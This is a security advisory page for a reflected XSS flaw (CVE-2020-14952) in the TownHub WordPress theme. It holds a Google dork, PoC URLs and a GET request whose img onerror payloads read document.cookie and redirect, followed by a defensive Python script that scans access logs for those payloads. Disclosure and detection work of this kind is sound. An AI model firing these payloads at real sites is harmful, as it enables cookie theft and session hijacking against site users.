TownHub – Directory & Listing WordPress Theme v1.2.9 – Unauthenticated Reflected XSS – CXSecurity.com

Vulnerability ID 2064115 Vulnerability type
Published 2020-06-22 Updated 2020-06-22
CVE number CVE-2020-14952

CNNVD-ID N/A
Platform N/A CVSS score N/A
|Source
https://cxsecurity.com/issue/WLB-2020060095
|Details
Vulnerability details have not yet been disclosed
|Exploit
[+] Exploit Title: TownHub - Directory & Listing WordPress Theme v1.2.9 - Unauthenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/townhub/
[+] Date: 2020-06-17
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: CTHthemes [ https://cththemes.com ]
[+] Software Version: 1.2.9
[+] Software Link: https://themeforest.net/item/townhub-directory-listing-wordpress-theme/25019571
[+] Tested on: Debian 10
[+] CVE: CVE-2020-14952
[+] CWE: CWE-79
### [ PoC: ]
[!] https://townhub.cththemes.com/?search_term=&location_search=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`)%3E&distance=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&nearby=&address_lat=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E&address_lng=%22%3E%3Cimg%20src=x%20onerror=alert(`PoC`);window.location=`https://twitter.com/vlad_vector`;%3E&lcats[]=195
[!] GET /?search_term=&location_search=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`)%3E&distance=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&nearby=&address_lat=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E&address_lng=%22%3E%3Cimg%20src=x%20onerror=alert(`PoC`);window.location=`https://twitter.com/vlad_vector`;%3E&lcats[]=195 HTTP/1.1
Host: townhub.cththemes.com
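The PoC above shows the reflected parameters (search_term, location_search, distance, nearby, address_lat, address_lng, lcats[]) being used to break out of an attribute value with %22%3E and inject an img tag with an event handler. The script below is an added example for defenders, not part of the advisory or of the theme: it scans web server access logs for that break-out pattern in those parameter names, decoding the query string repeatedly so a double-encoded variant is caught as well. The log lines embedded in it are constructed; only the payload encoding mirrors the advisory's PoC.

```python
"""Scan access-log lines for attribute break-out / tag injection in the
TownHub search parameters named in the advisory. Added example; the
parameter list comes from the PoC, the log lines are constructed."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Parameters the advisory reports as reflected into the page.
WATCHED_PARAMS = {"search_term", "location_search", "distance", "nearby",
                  "address_lat", "address_lng", "lcats[]"}

# Decoded markers of tag injection, attribute break-out, inline handlers.
SUSPICIOUS = re.compile(r'(<\s*[a-z!/]|"\s*>|\bon[a-z]+\s*=|javascript:)', re.I)

# Combined log format: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')


def decode_fully(value, rounds=3):
    """Percent-decode until stable so %2522%253E style double encoding
    ends up as the same '">' the browser would eventually see."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value


def inspect_request_target(target):
    """Return [(param, decoded_value)] for watched params that carry an
    injection marker; an empty list means the request looks benign."""
    query = urlsplit(target).query
    hits = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name not in WATCHED_PARAMS:
            continue
        for v in values:
            decoded = decode_fully(v)
            if SUSPICIOUS.search(decoded):
                hits.append((name, decoded))
    return hits


def scan_log(lines):
    """Parse each line, inspect the request target, and report one
    finding per suspicious request with the affected parameter names."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip it
        hits = inspect_request_target(m.group("target"))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": m.group("status"),
                "params": sorted({name for name, _ in hits}),
            })
    return findings


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    # benign search that touches the same parameters
    '203.0.113.5 - - [22/Jun/2020:10:15:32 +0000] "GET /?search_term=coffee'
    '&location_search=Boston&distance=10&nearby=&lcats[]=195 HTTP/1.1" '
    '200 5123 "-" "Mozilla/5.0"',
    # same encoding as the advisory PoC, two parameters carrying the payload
    '198.51.100.7 - - [22/Jun/2020:10:16:01 +0000] "GET /?search_term='
    '&location_search=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E'
    '&distance=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E'
    '&nearby=&lcats[]=195 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    # double-encoded variant of the same break-out in address_lat
    '198.51.100.7 - - [22/Jun/2020:10:16:09 +0000] "GET /?address_lat='
    '%2522%253E%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" '
    '200 5123 "-" "Mozilla/5.0"',
    'not a log line',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged request is the interesting case for a reflected XSS: the page rendered, so the payload was very likely echoed back. In practice the script would read real logs and feed findings into the SIEM; the parameter names are the only theme-specific part, and the decoded markers are generic enough to reuse for other reflected parameters.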
### [ Contacts: ]
[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector